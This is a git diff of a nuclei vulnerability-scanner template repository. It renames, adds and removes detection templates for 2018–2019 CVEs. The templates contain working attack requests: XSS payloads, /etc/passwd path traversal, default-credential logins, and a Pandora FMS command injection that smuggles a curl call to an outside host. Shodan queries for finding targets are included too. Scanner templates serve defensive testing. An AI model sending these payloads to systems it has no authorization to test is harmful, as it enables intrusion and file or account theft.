+ +# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/CVE-2018-20470.yaml b/nuclei-templates/CVE-2018/cve-2018-20470.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-20470.yaml rename to nuclei-templates/CVE-2018/cve-2018-20470.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-2392.yaml b/nuclei-templates/CVE-2018/cve-2018-2392.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-2392.yaml rename to nuclei-templates/CVE-2018/cve-2018-2392.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-3238.yaml b/nuclei-templates/CVE-2018/cve-2018-3238.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-3238.yaml rename to nuclei-templates/CVE-2018/cve-2018-3238.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-5715.yaml b/nuclei-templates/CVE-2018/cve-2018-5715.yaml new file mode 100644 index 0000000000..5097ee9d4b --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-5715.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-5715 + +info: + name: SugarCRM 3.5.1 - Cross-Site Scripting + author: edoardottt + severity: medium + description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable). + reference: + - https://www.exploit-db.com/exploits/43683 + - https://m4k4br0.github.io/sugarcrm-xss/ + - https://www.exploit-db.com/exploits/43683/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-5715 + cwe-id: CWE-79 + metadata: + google-query: intext:"SugarCRM Inc. All Rights Reserved" + shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" + tags: sugarcrm,xss,edb,cve,cve2018 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '&"/>=&"><< Back

' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/11 diff --git a/nuclei-templates/CVE-2018/CVE-2018-7251.yaml b/nuclei-templates/CVE-2018/cve-2018-7251.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7251.yaml rename to nuclei-templates/CVE-2018/cve-2018-7251.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7600.yaml b/nuclei-templates/CVE-2018/cve-2018-7600.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7600.yaml rename to nuclei-templates/CVE-2018/cve-2018-7600.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7602.yaml b/nuclei-templates/CVE-2018/cve-2018-7602.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7602.yaml rename to nuclei-templates/CVE-2018/cve-2018-7602.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7662.yaml b/nuclei-templates/CVE-2018/cve-2018-7662.yaml new file mode 100644 index 0000000000..c2cfc5117d --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7662.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-7662 + +info: + name: CouchCMS <= 2.0 - Path Disclosure + author: ritikchaddha + severity: medium + description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. + reference: + - https://github.com/CouchCMS/CouchCMS/issues/46 + - https://nvd.nist.gov/vuln/detail/CVE-2018-7662 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2018-7662 + cwe-id: CWE-200 + tags: couchcms,fpd,cve,cve2018 + +requests: + - method: GET + path: + - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php" + - "{{BaseURL}}/addons/phpmailer/phpmailer.php" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "mysql2i.func.php on line 10" + - "Fatal error: Cannot redeclare mysql_affected_rows() in" + condition: and + + - type: word + part: body + words: + - "phpmailer.php on line 10" + - "Fatal error: Call to a menber function add_event_listener() on a non-object in" + condition: and + +# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2018/CVE-2018-7700.yaml b/nuclei-templates/CVE-2018/cve-2018-7700.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7700.yaml rename to nuclei-templates/CVE-2018/cve-2018-7700.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-8006.yaml b/nuclei-templates/CVE-2018/cve-2018-8006.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-8006.yaml rename to nuclei-templates/CVE-2018/cve-2018-8006.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-8715.yaml b/nuclei-templates/CVE-2018/cve-2018-8715.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-8715.yaml rename to nuclei-templates/CVE-2018/cve-2018-8715.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-8727.yaml b/nuclei-templates/CVE-2018/cve-2018-8727.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-8727.yaml rename to nuclei-templates/CVE-2018/cve-2018-8727.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-9161.yaml b/nuclei-templates/CVE-2018/cve-2018-9161.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-9161.yaml rename to nuclei-templates/CVE-2018/cve-2018-9161.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-9205.yaml b/nuclei-templates/CVE-2018/cve-2018-9205.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-9205.yaml rename to nuclei-templates/CVE-2018/cve-2018-9205.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-9995.yaml b/nuclei-templates/CVE-2018/cve-2018-9995.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-9995.yaml rename to nuclei-templates/CVE-2018/cve-2018-9995.yaml diff --git "a/nuclei-templates/CVE-2018/cve-2018\342\200\22314064(1).yaml" "b/nuclei-templates/CVE-2018/cve-2018\342\200\22314064.yaml" similarity index 100% rename from "nuclei-templates/CVE-2018/cve-2018\342\200\22314064(1).yaml" rename to "nuclei-templates/CVE-2018/cve-2018\342\200\22314064.yaml" diff --git a/nuclei-templates/CVE-2019/cve-2019-0221.yaml b/nuclei-templates/CVE-2019/CVE-2019-0221.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-0221.yaml rename to nuclei-templates/CVE-2019/CVE-2019-0221.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-0230.yaml b/nuclei-templates/CVE-2019/CVE-2019-0230.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-0230.yaml rename to nuclei-templates/CVE-2019/CVE-2019-0230.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-1010290.yaml b/nuclei-templates/CVE-2019/CVE-2019-1010290.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-1010290.yaml rename to nuclei-templates/CVE-2019/CVE-2019-1010290.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-11370.yaml b/nuclei-templates/CVE-2019/CVE-2019-11370.yaml new file mode 100644 index 0000000000..58ffa77862 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-11370.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-11370 +info: + name: Carel pCOWeb < B1.2.4 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field. + reference: + - https://www.exploit-db.com/exploits/46897 + - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11370 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2019-11370 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"pCOWeb" + verified: "true" + tags: cve,cve2019,pcoweb,xss,carel +requests: + - raw: + - | + POST /config/pw_snmp_done.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + - | + GET /config/pw_snmp.html HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "text/html")' + - status_code_2 == 200 + - contains(body_2, 'value=\"\">\">') + condition: and diff --git a/nuclei-templates/CVE-2019/cve-2019-11869.yaml b/nuclei-templates/CVE-2019/CVE-2019-11869.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-11869.yaml rename to nuclei-templates/CVE-2019/CVE-2019-11869.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml b/nuclei-templates/CVE-2019/CVE-2019-12581.yaml deleted file mode 100644 index e55f98cb7e..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2019-12581 -info: - name: Zyxel ZyWall / USG / UAG - Reflected Cross-site scripting - author: n-thumann - severity: medium - description: A reflective Cross-site scripting (XSS) vulnerability in the free_time_failed.cgi CGI program in selected Zyxel ZyWall, USG, and UAG devices allows remote attackers to inject arbitrary web script or HTML via the err_msg parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 - - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ - - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12581 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"ZyWall" - tags: cve,cve2019,zyxel,zywall,xss -requests: - - method: GET - path: - - "{{BaseURL}}/free_time_failed.cgi?err_msg=" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Please contact with administrator." - condition: and - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-12725.yaml b/nuclei-templates/CVE-2019/CVE-2019-12725.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-12725.yaml rename to nuclei-templates/CVE-2019/CVE-2019-12725.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml b/nuclei-templates/CVE-2019/CVE-2019-12962.yaml deleted file mode 100644 index 0be257a894..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2019-12962 -info: - name: LiveZilla Server 8.0.1.0 - Cross Site Scripting - author: Clment Cruchet - severity: medium - description: | - LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS - reference: - - https://www.exploit-db.com/exploits/49669 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12962 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:LiveZilla - verified: true - tags: cve,cve2019,livezilla,xss -requests: - - method: GET - path: - - '{{BaseURL}}/mobile/index.php' - headers: - Accept-Language: ';alert(document.domain)//' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var detectedLanguage = ';alert(document.domain)//';" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-13396.yaml b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml new file mode 100644 index 0000000000..6d6f9a7db9 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-13396 +info: + name: FlightPath Local File Inclusion + author: 0x_Akoko + severity: high + description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability. + reference: + - https://www.cvedetails.com/cve/CVE-2019-13396/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2019-13396 + cwe-id: CWE-22 + tags: cve,cve2021,metabase,lfi + +requests: + - raw: + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + condition: or + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-13462.yaml b/nuclei-templates/CVE-2019/CVE-2019-13462.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-13462.yaml rename to nuclei-templates/CVE-2019/CVE-2019-13462.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-14205.yaml b/nuclei-templates/CVE-2019/CVE-2019-14205.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14205.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14205.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-14312.yaml b/nuclei-templates/CVE-2019/CVE-2019-14312.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14312.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14312.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-14974.yaml b/nuclei-templates/CVE-2019/CVE-2019-14974.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-14974.yaml rename to nuclei-templates/CVE-2019/CVE-2019-14974.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15107.yaml b/nuclei-templates/CVE-2019/CVE-2019-15107.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15107.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15107.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15713.yaml b/nuclei-templates/CVE-2019/CVE-2019-15713.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15713.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15713.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15811.yaml b/nuclei-templates/CVE-2019/CVE-2019-15811.yaml deleted file mode 100644 index a8adc52d15..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-15811.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2019-15811 -info: - name: DomainMOD 4.13.0 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters. - reference: - - https://www.exploit-db.com/exploits/47325 - - https://github.com/domainmod/domainmod/issues/108 - - https://zerodays.lol/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-15811 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2019,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' - - 'contains(body_2, "DomainMOD")' - condition: and diff --git a/nuclei-templates/CVE-2019/cve-2019-15858.yaml b/nuclei-templates/CVE-2019/CVE-2019-15858.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15858.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15858.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15889.yaml b/nuclei-templates/CVE-2019/CVE-2019-15889.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15889.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15889.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16278.yaml b/nuclei-templates/CVE-2019/CVE-2019-16278.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16278.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16278.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16313.yaml b/nuclei-templates/CVE-2019/CVE-2019-16313.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16313.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16313.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16332.yaml b/nuclei-templates/CVE-2019/CVE-2019-16332.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16332.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16332.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-16920.yaml b/nuclei-templates/CVE-2019/CVE-2019-16920.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16920.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16920.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16931.yaml b/nuclei-templates/CVE-2019/CVE-2019-16931.yaml deleted file mode 100644 index 7cccc93c52..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-16931.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2019-16931 -info: - name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS) - author: ritikchaddha - severity: medium - description: | - By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart. - reference: - - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 - - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 - - https://wpvulndb.com/vulnerabilities/9893 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-16931 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth -requests: - - raw: - - | - POST /wp-json/visualizer/v1/update-chart HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"id": 7, "visualizer-chart-type": ""} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"success":"Chart updated"}' - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-17270.yaml b/nuclei-templates/CVE-2019/CVE-2019-17270.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17270.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17270.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17444.yaml b/nuclei-templates/CVE-2019/CVE-2019-17444.yaml deleted file mode 100644 index e02dbd7ffb..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17444.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2019-17444 - -info: - author: pdteam - name: Jfrog Artifactory default password - severity: critical - description: | - Jfrog Artifactory uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0. - reference: - - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes - - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory - - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-17444 - cwe-id: CWE-521 - tags: cve,cve2019,jfrog,default-login - -requests: - - raw: - - | - POST /ui/api/v1/ui/auth/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json;charset=UTF-8 - X-Requested-With: XMLHttpRequest - Origin: {{RootURL}} - - {"user":"admin","password":"password","type":"login"} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"name":"admin"' - - '"admin":true' - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-18922.yaml b/nuclei-templates/CVE-2019/CVE-2019-18922.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-18922.yaml rename to nuclei-templates/CVE-2019/CVE-2019-18922.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-19368.yaml b/nuclei-templates/CVE-2019/CVE-2019-19368.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-19368.yaml rename to nuclei-templates/CVE-2019/CVE-2019-19368.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-19824.yaml b/nuclei-templates/CVE-2019/CVE-2019-19824.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-19824.yaml rename to nuclei-templates/CVE-2019/CVE-2019-19824.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-20210.yaml b/nuclei-templates/CVE-2019/CVE-2019-20210.yaml deleted file mode 100644 index 43994e7cf1..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-20210.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2019-20210 -info: - name: CTHthemes CityBook < 2.3.4 - Reflected XSS - author: edoardottt - severity: medium - description: | - The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query. - reference: - - https://wpscan.com/vulnerability/10013 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 - - https://wpvulndb.com/vulnerabilities/10018 - - https://cxsecurity.com/issue/WLB-2019120112 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-20210 - cwe-id: CWE-79 - tags: cve,cve2019,wordpress,citybook,xss,wp-theme -requests: - - method: GET - path: - - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "/wp-content/themes/citybook" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-20224.yaml b/nuclei-templates/CVE-2019/CVE-2019-20224.yaml new file mode 100644 index 0000000000..b7a2d0559b --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-20224.yaml @@ -0,0 +1,48 @@ +id: CVE-2019-20224 +info: + name: Pandora FMS 7.0NG - Remote Command Injection + author: ritikchaddha + severity: high + description: | + Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. + reference: + - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ + - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 + - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view + remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-20224 + cwe-id: CWE-78 + tags: pandorafms,rce,cve,cve2019,authenticated,oast +requests: + - raw: + - | + POST /pandora_console/index.php?login=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nick=admin&pass=admin&login_button=Login + - | + POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/CVE-2019-20354.yaml b/nuclei-templates/CVE-2019/CVE-2019-20354.yaml deleted file mode 100644 index ac3941c763..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-20354.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2019-20354 -info: - author: "pikpikcu" - name: "piSignage 2.6.4 Directory Traversal" - severity: High - #Source:-https://github.com/colloqi/piSignage/issues/97 -requests: - - raw: - - "GET /api/settings/log?file=../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 277\nConnection: close\nReferer: {{Hostname}}\n \n" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2019/CVE-2019-2616.yaml b/nuclei-templates/CVE-2019/CVE-2019-2616.yaml deleted file mode 100644 index f6c8aa1ffb..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-2616.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-2616 -info: - name: XXE in Oracle Business Intelligence and XML Publisher - author: pdteam - severity: high - description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cve-id: CVE-2019-2616 - tags: cve,cve2019,oracle,xxe,oast,kev -requests: - - raw: - - | - POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Type: text/xml; charset=UTF-8 - - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2019/cve-2019-3396.yaml b/nuclei-templates/CVE-2019/CVE-2019-3396.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-3396.yaml rename to nuclei-templates/CVE-2019/CVE-2019-3396.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-3929.yaml b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-3929.yaml rename to nuclei-templates/CVE-2019/CVE-2019-3929.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-6112.yaml b/nuclei-templates/CVE-2019/CVE-2019-6112.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-6112.yaml rename to nuclei-templates/CVE-2019/CVE-2019-6112.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-7315.yaml b/nuclei-templates/CVE-2019/CVE-2019-7315.yaml deleted file mode 100644 index 7e2cb32f90..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-7315.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-7315 -info: - name: Genie Access WIP3BVAF IP Camera - Directory Traversal - author: 0x_Akoko - severity: high - description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow. - reference: - - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/ - - https://vuldb.com/?id.136593 - - https://www.cvedetails.com/cve/CVE-2019-7315 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-7315 - cwe-id: CWE-22 - tags: cve,cve2019,camera,genie,lfi,iot -requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - 